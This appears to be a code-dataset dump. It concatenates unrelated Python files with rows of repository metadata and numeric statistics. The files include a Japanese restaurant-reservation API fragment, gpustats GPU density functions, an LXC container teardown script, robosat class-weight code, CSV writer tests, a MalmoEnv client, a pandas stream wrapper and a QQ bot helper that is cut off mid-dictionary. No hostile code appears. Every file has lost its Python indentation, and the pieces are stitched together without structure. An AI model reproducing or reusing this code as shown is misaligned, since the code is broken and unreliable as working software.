if 'error' in user_profile and 'expired' in user_profile['error_description']: # noqa 501
return utils.create_error_response('Forbidden', 403)
else:
body['userId'] = user_profile['sub']
except Exception:
logger.exception('不正なIDトークンが使用されています')
return utils.create_error_response('Error')
# パラメータチェック
param_checker = RestaurantParamCheck(body)
if error_msg := param_checker.check_api_reservation_put():
error_msg_disp = ('\n').join(error_msg)
logger.error(error_msg_disp)
return utils.create_error_response(error_msg_disp, 400)
try:
# 予約情報のデータ登録
shop_info = shop_master_table_controller.get_item(body['shopId'])
put_shop_reservation_info(body, shop_info)
reservation_id = put_customer_reservation_info(body, shop_info)
# pushメッセージをDynamoに保存
put_push_messages_to_dynamo(body, REMIND_DATE_DIFFERENCE)
except Exception as e:
logger.error('Occur Exception: %s', e)
return utils.create_error_response('ERROR')
return utils.create_success_response(
json.dumps({'reservationId': reservation_id}))
| 32.52381 | 99 | 0.66194 | 1,270 | 12,977 | 6.377165 | 0.227559 | 0.021114 | 0.032103 | 0.013582 | 0.263736 | 0.206816 | 0.123719 | 0.072602 | 0.061242 | 0.038523 | 0 | 0.004809 | 0.246898 | 12,977 | 398 | 100 | 32.605528 | 0.8238 | 0.182862 | 0 | 0.066327 | 0 | 0 | 0.140527 | 0.020754 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045918 | false | 0 | 0.061224 | 0 | 0.173469 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cc5c90cc24e579e7e39dd76fdb62ea4b310c1d | 8,710 | py | Python | gpustats/pdfs.py | dukestats/gpustats | 570fdeb4d1da204b1e56717ba29db07a08be8629 | [
"BSD-3-Clause"
] | 23 | 2015-02-01T23:46:52.000Z | 2021-01-13T18:07:47.000Z | gpustats/pdfs.py | dukestats/gpustats | 570fdeb4d1da204b1e56717ba29db07a08be8629 | [
"BSD-3-Clause"
] | null | null | null | gpustats/pdfs.py | dukestats/gpustats | 570fdeb4d1da204b1e56717ba29db07a08be8629 | [
"BSD-3-Clause"
] | 6 | 2015-06-18T10:23:59.000Z | 2020-05-05T22:32:40.000Z | from numpy.random import randn
from numpy.linalg import cholesky as chol
import numpy as np
import numpy.linalg as LA
from pycuda.gpuarray import GPUArray, to_gpu
from pycuda.gpuarray import empty as gpu_empty
import gpustats.kernels as kernels
import gpustats.codegen as codegen
from gpustats.util import transpose as gpu_transpose
reload(codegen)
reload(kernels)
import gpustats.util as util
import pycuda.driver as drv
__all__ = ['mvnpdf', 'mvnpdf_multi', 'normpdf', 'normpdf_multi']
cu_module = codegen.get_full_cuda_module()
#-------------------------------------------------------------------------------
# Invokers for univariate and multivariate density functions conforming to the
# standard API
def _multivariate_pdf_call(cu_func, data, packed_params, get, order,
datadim=None):
packed_params = util.prep_ndarray(packed_params)
func_regs = cu_func.num_regs
# Prep the data. Skip if gpudata ...
if isinstance(data, GPUArray):
padded_data = data
if datadim==None:
ndata, dim = data.shape
else:
ndata, dim = data.shape[0], datadim
else:
ndata, dim = data.shape
padded_data = util.pad_data(data)
nparams = len(packed_params)
data_per, params_per = util.tune_blocksize(padded_data,
packed_params,
func_regs)
blocksize = data_per * params_per
#print 'the blocksize is ' + str(blocksize)
#print 'data_per ' + str(data_per) + '. params_per ' + str(params_per)
shared_mem = util.compute_shmem(padded_data, packed_params,
data_per, params_per)
block_design = (data_per * params_per, 1, 1)
grid_design = (util.get_boxes(ndata, data_per),
util.get_boxes(nparams, params_per))
# see cufiles/mvcaller.cu
design = np.array(((data_per, params_per) + # block design
padded_data.shape + # data spec
(dim,) + # non-padded number of data columns
packed_params.shape), # params spec
dtype=np.int32)
if nparams == 1:
gpu_dest = gpu_empty(ndata, dtype=np.float32)
#gpu_dest = to_gpu(np.zeros(ndata, dtype=np.float32))
else:
gpu_dest = gpu_empty((ndata, nparams), dtype=np.float32, order='F')
#gpu_dest = to_gpu(np.zeros((ndata, nparams), dtype=np.float32, order='F'))
# Upload data if not already uploaded
if not isinstance(padded_data, GPUArray):
gpu_padded_data = to_gpu(padded_data)
else:
gpu_padded_data = padded_data
gpu_packed_params = to_gpu(packed_params)
params = (gpu_dest, gpu_padded_data, gpu_packed_params) + tuple(design)
kwds = dict(block=block_design, grid=grid_design, shared=shared_mem)
cu_func(*params, **kwds)
gpu_packed_params.gpudata.free()
if get:
if order=='F':
return gpu_dest.get()
else:
return np.asarray(gpu_dest.get(), dtype=np.float32, order='C')
#output = gpu_dest.get()
#if nparams > 1:
# output = output.reshape((nparams, ndata), order='C').T
#return output
else:
if order=='F' or nparams==1:
return gpu_dest
else:
res = gpu_transpose(util.GPUarray_reshape(gpu_dest, (nparams, ndata), "C"))
gpu_dest.gpudata.free()
return res
#return gpu_transpose(gpu_dest.reshape(nparams, ndata, 'C'))
def _univariate_pdf_call(cu_func, data, packed_params, get):
ndata = len(data)
nparams = len(packed_params)
func_regs = cu_func.num_regs
packed_params = util.prep_ndarray(packed_params)
data_per, params_per = util.tune_blocksize(data,
packed_params,
func_regs)
shared_mem = util.compute_shmem(data, packed_params,
data_per, params_per)
block_design = (data_per * params_per, 1, 1)
grid_design = (util.get_boxes(ndata, data_per),
util.get_boxes(nparams, params_per))
# see cufiles/univcaller.cu
#gpu_dest = to_gpu(np.zeros((ndata, nparams), dtype=np.float32))
gpu_dest = gpu_empty((ndata, nparams), dtype=np.float32)
gpu_data = data if isinstance(data, GPUArray) else to_gpu(data)
gpu_packed_params = to_gpu(packed_params)
design = np.array(((data_per, params_per) + # block design
(len(data),) +
packed_params.shape), # params spec
dtype=np.int32)
cu_func(gpu_dest,
gpu_data, gpu_packed_params, design[0],
design[1], design[2], design[3], design[4],
block=block_design, grid=grid_design, shared=shared_mem)
if get:
output = gpu_dest.get()
if nparams > 1:
output = output.reshape((nparams, ndata), order='C').T
return output
else:
return gpu_dest
#-------------------------------------------------------------------------------
# Multivariate normal
def mvnpdf(data, mean, cov, weight=None, logged=True, get=True, order="F",
datadim=None):
"""
Multivariate normal density
Parameters
----------
Returns
-------
"""
return mvnpdf_multi(data, [mean], [cov],
logged=logged, get=get, order=order,
datadim=datadim).squeeze()
def mvnpdf_multi(data, means, covs, weights=None, logged=True,
get=True, order="F", datadim=None):
"""
Multivariate normal density with multiple sets of parameters
Parameters
----------
data : ndarray (n x k)
covs : sequence of 2d k x k matrices (length j)
weights : ndarray (length j)
Multiplier for component j, usually will sum to 1
get = False leaves the result on the GPU
without copying back.
If data has already been padded, the orginal dimension
must be passed in datadim
It data is of GPUarray type, the data is assumed to be
padded, and datadim will need to be passed if padding
was needed.
Returns
-------
densities : n x j
"""
if logged:
cu_func = cu_module.get_function('log_pdf_mvnormal')
else:
cu_func = cu_module.get_function('pdf_mvnormal')
assert(len(covs) == len(means))
ichol_sigmas = [LA.inv(chol(c)) for c in covs]
logdets = [-2.0*np.log(c.diagonal()).sum() for c in ichol_sigmas]
if weights is None:
weights = np.ones(len(means))
packed_params = _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights)
return _multivariate_pdf_call(cu_func, data, packed_params,
get, order,datadim)
def _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights):
to_pack = []
for m, ch, ld, w in zip(means, ichol_sigmas, logdets, weights):
to_pack.append(_pack_mvnpdf_params_single(m, ch, ld, w))
return np.vstack(to_pack)
def _pack_mvnpdf_params_single(mean, ichol_sigma, logdet, weight=1):
PAD_MULTIPLE = 16
k = len(mean)
mean_len = k
ichol_len = k * (k + 1) / 2
mch_len = mean_len + ichol_len
packed_dim = util.next_multiple(mch_len + 2, PAD_MULTIPLE)
packed_params = np.empty(packed_dim, dtype=np.float32)
packed_params[:mean_len] = mean
packed_params[mean_len:mch_len] = ichol_sigma[np.tril_indices(k)]
packed_params[mch_len:mch_len + 2] = weight, logdet
return packed_params
#-------------------------------------------------------------------------------
# Univariate normal
def normpdf(x, mean, std, logged=True, get=True):
"""
Normal (Gaussian) density
Parameters
----------
Returns
-------
"""
return normpdf_multi(x, [mean], [std], logged=logged, get=get).squeeze()
def normpdf_multi(x, means, std, logged=True, get=True):
if logged:
cu_func = cu_module.get_function('log_pdf_normal')
else:
cu_func = cu_module.get_function('pdf_normal')
packed_params = np.c_[means, std]
if not isinstance(x, GPUArray):
x = util.prep_ndarray(x)
return _univariate_pdf_call(cu_func, x, packed_params, get)
if __name__ == '__main__':
import gpustats.compat as compat
n = 1e5
k = 8
np.random.seed(1)
data = randn(n, k).astype(np.float32)
mean = randn(k).astype(np.float32)
cov = util.random_cov(k).astype(np.float32)
result = mvnpdf_multi(data, [mean, mean], [cov, cov])
# pyresult = compat.python_mvnpdf(data, [mean], [cov]).squeeze()
# print result - pyresult
| 31.904762 | 87 | 0.604363 | 1,118 | 8,710 | 4.489267 | 0.186941 | 0.071727 | 0.025902 | 0.031879 | 0.407252 | 0.341303 | 0.340705 | 0.314405 | 0.233911 | 0.16577 | 0 | 0.008586 | 0.264524 | 8,710 | 272 | 88 | 32.022059 | 0.774899 | 0.207807 | 0 | 0.296774 | 0 | 0 | 0.01575 | 0 | 0 | 0 | 0 | 0 | 0.006452 | 1 | 0.051613 | false | 0 | 0.077419 | 0 | 0.206452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cd7df99f005e209b5f37b4b931f77cc897a454 | 2,950 | py | Python | scripts/python/teardown_deployer_container.py | rbrud/power-up | c0d59a79ad9c713d94da73395a5fd768fcfff838 | [
"Apache-2.0"
] | null | null | null | scripts/python/teardown_deployer_container.py | rbrud/power-up | c0d59a79ad9c713d94da73395a5fd768fcfff838 | [
"Apache-2.0"
] | null | null | null | scripts/python/teardown_deployer_container.py | rbrud/power-up | c0d59a79ad9c713d94da73395a5fd768fcfff838 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2018 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import nested_scopes, generators, division, absolute_import, \
with_statement, print_function, unicode_literals
import argparse
import os.path
import sys
from subprocess import Popen, PIPE
from lib.config import Config
from lib.exception import UserException
from lib.genesis import DEFAULT_CONTAINER_NAME, GEN_PATH
import lib.logger as logger
def _sub_proc_exec(cmd):
data = Popen(cmd.split(), stdout=PIPE, stderr=PIPE)
stdout, stderr = data.communicate()
return stdout, stderr
def teardown_deployer_container(config_path):
"""Teardown the Cluster Genesis container on the deployer.
This function is idempotent.
"""
log = logger.getlogger()
try:
cfg = Config(config_path)
except UserException:
log.error('Unable to open Cluster Genesis config.yml file')
sys.exit(1)
for vlan in cfg.yield_depl_netw_client_vlan('pxe'):
break
name = '{}-pxe{}'.format(DEFAULT_CONTAINER_NAME, vlan)
container_list, stderr = _sub_proc_exec('lxc-ls')
log.info('Found containers: {}'.format(container_list))
if name not in container_list:
log.info('container name: {} does not exist.'.format(name))
else:
log.info('Destroying container: {}'.format(name))
result, stderr = _sub_proc_exec('lxc-stop -n {}'.format(name))
result, stderr = _sub_proc_exec('lxc-destroy -s -n {}'.format(name))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('config_path', default='config.yml',
help='Config file path. Absolute path or relative '
'to power-up/')
parser.add_argument('--print', '-p', dest='log_lvl_print',
help='print log level', default='info')
parser.add_argument('--file', '-f', dest='log_lvl_file',
help='file log level', default='info')
args = parser.parse_args()
if not os.path.isfile(args.config_path):
args.config_path = GEN_PATH + args.config_path
print('Using config path: {}'.format(args.config_path))
if not os.path.isfile(args.config_path):
sys.exit('{} does not exist'.format(args.config_path))
logger.create(args.log_lvl_print, args.log_lvl_file)
teardown_deployer_container(args.config_path)
| 34.705882 | 78 | 0.689831 | 401 | 2,950 | 4.905237 | 0.418953 | 0.055923 | 0.049822 | 0.025928 | 0.078292 | 0.068124 | 0.068124 | 0.068124 | 0 | 0 | 0 | 0.00382 | 0.201356 | 2,950 | 84 | 79 | 35.119048 | 0.83107 | 0.228136 | 0 | 0.040816 | 0 | 0 | 0.168224 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.040816 | false | 0 | 0.183673 | 0 | 0.244898 | 0.102041 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cf62bcfc6f390b8547295d8aba6cd8cecf7a30 | 1,808 | py | Python | robosat/tools/weights.py | jjmata/robosat | 6b38bcf5cbf13bf79c06624d30600df12cfdd486 | [
"MIT"
] | 2 | 2018-08-05T04:35:41.000Z | 2019-01-15T02:41:37.000Z | robosat/tools/weights.py | jjmata/robosat | 6b38bcf5cbf13bf79c06624d30600df12cfdd486 | [
"MIT"
] | null | null | null | robosat/tools/weights.py | jjmata/robosat | 6b38bcf5cbf13bf79c06624d30600df12cfdd486 | [
"MIT"
] | 1 | 2021-02-22T20:58:34.000Z | 2021-02-22T20:58:34.000Z | import os
import argparse
import numpy as np
from tqdm import tqdm
import torch
from torch.utils.data import DataLoader
from torchvision.transforms import Compose
from robosat.config import load_config
from robosat.datasets import SlippyMapTiles
from robosat.transforms import ConvertImageMode, MaskToTensor
def add_parser(subparser):
parser = subparser.add_parser(
"weights", help="computes class weights on dataset", formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument("--dataset", type=str, required=True, help="path to dataset configuration file")
parser.set_defaults(func=main)
def main(args):
dataset = load_config(args.dataset)
path = dataset["common"]["dataset"]
num_classes = len(dataset["common"]["classes"])
train_transform = Compose([ConvertImageMode(mode="P"), MaskToTensor()])
train_dataset = SlippyMapTiles(os.path.join(path, "training", "labels"), transform=train_transform)
n = 0
counts = np.zeros(num_classes, dtype=np.int64)
loader = DataLoader(train_dataset, batch_size=1)
for images, tile in tqdm(loader, desc="Loading", unit="image", ascii=True):
image = torch.squeeze(images)
image = np.array(image, dtype=np.uint8)
n += image.shape[0] * image.shape[1]
counts += np.bincount(image.ravel(), minlength=num_classes)
# Class weighting scheme `w = 1 / ln(c + p)` see:
# - https://arxiv.org/abs/1707.03718
# LinkNet: Exploiting Encoder Representations for Efficient Semantic Segmentation
# - https://arxiv.org/abs/1606.02147
# ENet: A Deep Neural Network Architecture for Real-Time Semantic Segmentation
probs = counts / n
weights = 1 / np.log(1.02 + probs)
weights.round(6, out=weights)
print(weights.tolist())
| 31.172414 | 115 | 0.709624 | 230 | 1,808 | 5.513043 | 0.530435 | 0.026025 | 0.020505 | 0.025237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020833 | 0.176991 | 1,808 | 57 | 116 | 31.719298 | 0.831317 | 0.155973 | 0 | 0 | 0 | 0 | 0.089474 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0.294118 | 0 | 0.352941 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5cfe67a66b476f28011597c8c7dca4079459b75 | 1,807 | py | Python | tests/writers/test_csv_writer.py | cnHeider/draugr | b95e0bb1fa5efa581bfb28ff604f296ed2e6b7d6 | [
"Apache-2.0"
] | 3 | 2019-09-27T08:04:59.000Z | 2020-12-02T06:14:45.000Z | tests/writers/test_csv_writer.py | cnHeider/draugr | b95e0bb1fa5efa581bfb28ff604f296ed2e6b7d6 | [
"Apache-2.0"
] | 64 | 2019-09-27T08:03:42.000Z | 2022-03-28T15:07:30.000Z | tests/writers/test_csv_writer.py | cnHeider/draugr | b95e0bb1fa5efa581bfb28ff604f296ed2e6b7d6 | [
"Apache-2.0"
] | 1 | 2020-10-01T00:18:57.000Z | 2020-10-01T00:18:57.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import pytest
from draugr import PROJECT_APP_PATH
from draugr.writers import CSVWriter
__author__ = "Christian Heider Nielsen"
__doc__ = r"""
"""
@pytest.mark.parametrize(
["tag", "val", "step"],
(("signal", 0, 0), ("signal", 20, 1), ("signal", -1, 6)),
ids=["signal_first", "signal_second", "signal_sixth"],
)
def test_valid_scalars(tag, val, step):
with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
w.scalar(tag, val, step)
@pytest.mark.parametrize(
["tag", "val", "step"],
(("signal", "", 0), ("signal", None, 1), ("signal", object(), 6)),
ids=["str_scalar", "None_scalar", "object_scalar"],
)
def test_invalid_val_type_scalars(tag, val, step):
try:
with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
w.scalar(tag, val, step)
assert False
except Exception as e:
assert True
@pytest.mark.parametrize(
["tag", "val", "step"],
((1, 0, 0), (None, 20, 1), (object(), -1, 6)),
ids=["numeral_tag", "None_tag", "object_tag"],
)
def test_invalid_tag_scalars(tag, val, step):
try:
with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
w.scalar(tag, val, step)
assert False
except Exception as e:
print(e)
assert True
@pytest.mark.parametrize(
["tag", "val", "step"],
(("signal", 0, ""), ("signal", 20, None), ("tag1", -0, object())),
ids=["str_step", "None_step", "object_step"],
)
def test_invalid_step_type_scalars(tag, val, step):
try:
with CSVWriter(path=PROJECT_APP_PATH.user_log / "csv_writer") as w:
w.scalar(tag, val, step)
assert False
except Exception as e:
print(e)
assert True
| 27.8 | 75 | 0.600443 | 244 | 1,807 | 4.237705 | 0.258197 | 0.069633 | 0.116054 | 0.092843 | 0.601547 | 0.601547 | 0.601547 | 0.601547 | 0.564797 | 0.440039 | 0 | 0.017819 | 0.223575 | 1,807 | 64 | 76 | 28.234375 | 0.719173 | 0.023796 | 0 | 0.576923 | 0 | 0 | 0.167991 | 0 | 0 | 0 | 0 | 0 | 0.115385 | 1 | 0.076923 | false | 0 | 0.057692 | 0 | 0.134615 | 0.038462 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5d3ce795825a573ecfd97ed106d9047f0b7c331 | 2,242 | py | Python | MalmoEnv/proxyenv/malmo_proxyenv_client.py | andredornas/malmo | 26433ad2e60035726232ab54a3dac044dea9724f | [
"MIT"
] | 3,570 | 2016-07-08T04:04:25.000Z | 2019-05-05T12:05:38.000Z | MalmoEnv/proxyenv/malmo_proxyenv_client.py | NickKok/malmo | 26433ad2e60035726232ab54a3dac044dea9724f | [
"MIT"
] | 592 | 2016-07-08T10:33:40.000Z | 2019-05-03T15:08:15.000Z | MalmoEnv/proxyenv/malmo_proxyenv_client.py | NickKok/malmo | 26433ad2e60035726232ab54a3dac044dea9724f | [
"MIT"
] | 607 | 2016-07-08T01:01:52.000Z | 2019-05-05T22:06:40.000Z | # ------------------------------------------------------------------------------------------------
# Copyright (c) 2019 Microsoft Corporation
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and
# associated documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
# NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# ------------------------------------------------------------------------------------------------
import gym
import numpy as np
import proxyenv.client
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
arg_parser = ArgumentParser(description='example malmo env runner',
formatter_class=ArgumentDefaultsHelpFormatter)
arg_parser.add_argument('--host', type=str, default='localhost', help='Optional host to connect to.')
arg_parser.add_argument('--port', type=int, default=50050, help='Optional port to connect to.')
args = arg_parser.parse_args()
config = {"mission_file": "MalmoPlatform9000/MalmoEnv/missions/findthegoal.xml"}
env = proxyenv.client.ProxyEnv(args.host, args.port, config)
env.reset()
done = False
while not done:
action = env.action_space.sample()
print("action " + repr(action))
obs, reward, done, info = env.step(action)
print("obs " + repr(obs))
print("reward " + repr(reward))
print("done " + repr(done))
print("info " + repr(info))
env.close()
| 43.960784 | 101 | 0.684211 | 286 | 2,242 | 5.328671 | 0.520979 | 0.057743 | 0.01706 | 0.026247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006831 | 0.151204 | 2,242 | 50 | 102 | 44.84 | 0.794009 | 0.559768 | 0 | 0 | 0 | 0 | 0.198347 | 0.052686 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.227273 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5d6e141d164bfaecd369a0ec83a3d87322f3c80 | 6,263 | py | Python | streams/wrappers/pandas_stream.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/wrappers/pandas_stream.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | null | null | null | streams/wrappers/pandas_stream.py | kefir/snakee | a17734d4b2d7dfd3e6c7b195baa128fbc84d197b | [
"MIT"
] | 2 | 2021-04-10T19:22:15.000Z | 2022-03-08T19:37:56.000Z | from typing import Optional, Iterable, Union
try: # Assume we're a sub-module in a package.
from utils import arguments as arg
from utils.external import pd, DataFrame
from interfaces import StreamInterface, ColumnarInterface, Field
from streams import stream_classes as sm
except ImportError: # Apparently no higher-level package has been imported, fall back to a local import.
from ...utils import arguments as arg
from ...utils.external import pd, DataFrame
from ...interfaces import StreamInterface, ColumnarInterface, Field
from .. import stream_classes as sm
Native = Union[StreamInterface, ColumnarInterface]
class PandasStream(sm.WrapperStream, sm.ColumnarMixin, sm.ConvertMixin):
def __init__(
self,
data,
name=arg.AUTO,
source=None,
context=None,
):
assert pd, 'Pandas must be installed and imported for instantiate PandasStream (got fallback {})'.format(pd)
if isinstance(data, DataFrame) or data.__class__.__name__ == 'DataFrame':
dataframe = data
elif hasattr(data, 'get_dataframe'): # isinstance(data, RecordStream):
dataframe = data.get_dataframe()
else: # isinstance(data, (list, tuple)):
dataframe = DataFrame(data=data)
super().__init__(
dataframe,
name=name,
source=source,
context=context,
)
def get_data(self) -> DataFrame:
return super().get_data()
@staticmethod
def get_item_type():
return pd.Series
@classmethod
def _is_valid_item(cls, item) -> bool:
return isinstance(item, pd.Series)
def is_in_memory(self) -> bool:
return True
def get_dataframe(self, columns=None) -> DataFrame:
data = self.get_data()
assert isinstance(data, DataFrame)
if columns:
data = data[columns]
return data
def get_count(self, final: bool = False) -> Optional[int]:
data = self.get_data()
assert isinstance(data, DataFrame)
return data.shape[0]
def get_items(self) -> Iterable:
yield from self.get_dataframe().iterrows()
def get_records(self, columns=arg.AUTO) -> Iterable:
stream = self.select(*columns) if arg.is_defined(columns) else self
return stream._get_mapped_items(lambda i: i[1].to_dict())
def get_rows(self, columns=arg.AUTO):
stream = self.select(*columns) if arg.is_defined(columns) else self
return stream._get_mapped_items(lambda i: i[1].to_list())
def get_columns(self) -> Iterable:
return self.get_dataframe().columns
def get_expected_count(self) -> int:
return self.get_dataframe().shape[0]
def take(self, count: Union[int, bool] = 1) -> Native:
if isinstance(count, bool):
if count:
return self
else:
return self.stream(DataFrame())
elif isinstance(count, int):
return self.stream(
self.get_dataframe().head(count),
)
else:
raise TypeError('Expected count as int or bool, got {}'.format(count))
def get_one_column_values(self, column: Field) -> Iterable:
column_name = arg.get_name(column)
return self.get_dataframe()[column_name]
def add_dataframe(self, dataframe: DataFrame, before=False) -> Native:
if before:
frames = [dataframe, self.get_dataframe()]
else:
frames = [self.get_dataframe(), dataframe]
concatenated = pd.concat(frames)
return self.stream(concatenated)
def add_items(self, items: Iterable, before: bool = False) -> Native:
dataframe = DataFrame(items)
return self.add_dataframe(dataframe, before)
def add_stream(self, stream: StreamInterface, before: bool = False) -> Native:
if isinstance(stream, PandasStream):
return self.add_dataframe(stream.get_data(), before=before)
else:
return self.add_items(stream.get_items(), before=before)
def add(self, dataframe_or_stream_or_items, before: bool = False, **kwargs) -> Native:
assert not kwargs, 'kwargs for PandasStream.add() not supported'
if isinstance(dataframe_or_stream_or_items, DataFrame):
return self.add_dataframe(dataframe_or_stream_or_items, before)
elif isinstance(dataframe_or_stream_or_items, StreamInterface) or sm.is_stream(dataframe_or_stream_or_items):
return self.add_stream(dataframe_or_stream_or_items, before)
elif isinstance(dataframe_or_stream_or_items, Iterable):
return self.add_items(dataframe_or_stream_or_items)
else:
msg = 'dataframe_or_stream_or_items must be DataFrame, Stream or Iterable, got {}'
raise TypeError(msg.format(dataframe_or_stream_or_items))
def select(self, *fields, **expressions) -> Native:
assert not expressions, 'custom expressions are not implemented yet'
dataframe = self.get_dataframe(columns=fields)
return self.stream(dataframe)
def filter(self, *filters, **expressions) -> Native:
assert not filters, 'custom filters are not implemented yet'
pandas_filter = None
for k, v in expressions.items():
one_filter = self.get_one_column_values(k) == v
if pandas_filter:
pandas_filter = pandas_filter & one_filter
else:
pandas_filter = one_filter
if pandas_filter:
data = self.get_data()[pandas_filter]
return self.stream(data)
else:
return self
def sort(self, *keys, reverse: bool = False) -> Native:
dataframe = self.get_dataframe().sort_values(
by=keys,
ascending=not reverse,
)
return self.stream(dataframe)
def group_by(self, *keys, as_pairs: bool = False) -> Native:
grouped = self.get_dataframe().groupby(
by=keys,
as_index=as_pairs,
)
return self.stream(grouped)
def is_empty(self) -> bool:
return self.get_count() == 0
def collect(self) -> Native:
return self
| 37.279762 | 117 | 0.637235 | 741 | 6,263 | 5.19973 | 0.202429 | 0.051908 | 0.041526 | 0.049312 | 0.253569 | 0.194654 | 0.1687 | 0.1687 | 0.14586 | 0.14586 | 0 | 0.00131 | 0.268721 | 6,263 | 167 | 118 | 37.502994 | 0.839956 | 0.029858 | 0 | 0.164286 | 0 | 0 | 0.056004 | 0.004612 | 0 | 0 | 0 | 0 | 0.042857 | 1 | 0.171429 | false | 0 | 0.078571 | 0.057143 | 0.457143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
c5d75329430bdda15fd5e6ec9cd27c0a98a28ad4 | 2,088 | py | Python | botstart/util/wfUtils.py | cat991/py-go-cqhttp | 4042b697ddaba24687311088390db8d7e8f977d4 | [
"MIT"
] | 2 | 2022-03-05T18:49:19.000Z | 2022-03-07T13:23:57.000Z | botstart/util/wfUtils.py | cat991/py-go-cqhttp | 4042b697ddaba24687311088390db8d7e8f977d4 | [
"MIT"
] | null | null | null | botstart/util/wfUtils.py | cat991/py-go-cqhttp | 4042b697ddaba24687311088390db8d7e8f977d4 | [
"MIT"
] | null | null | null | import requests
import win32api,win32con
import json,os,sys
configs={
'url':"http://127.0.0.1:10429",
'textcont': 0
}
#获取桌面路径
def get_desktop():
key =win32api.RegOpenKey(win32con.HKEY_CURRENT_USER,r'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0,win32con.KEY_READ)
return win32api.RegQueryValueEx(key,'Desktop')[0]
#发送私聊消息
def privatemsg(login,toqq,text):
url = configs.get('url')+ '/sendprivatemsg'
print('====>触发私聊消息')
data = {
'logonqq':login,
'toqq':toqq,
'msg':text
}
requests.post(url,data=data)
#获取框架登陆qq信息
def getlogonqq():
url = configs.get('url')+'/getlogonqq'
return requests.post(url).text
#上传zk内容图片
def uploadzkpic(loginqq,group,path):
url = configs.get('url')+'/uploadgrouppic'
data={
'logonqq': loginqq,
'group': group,
'type':"path",
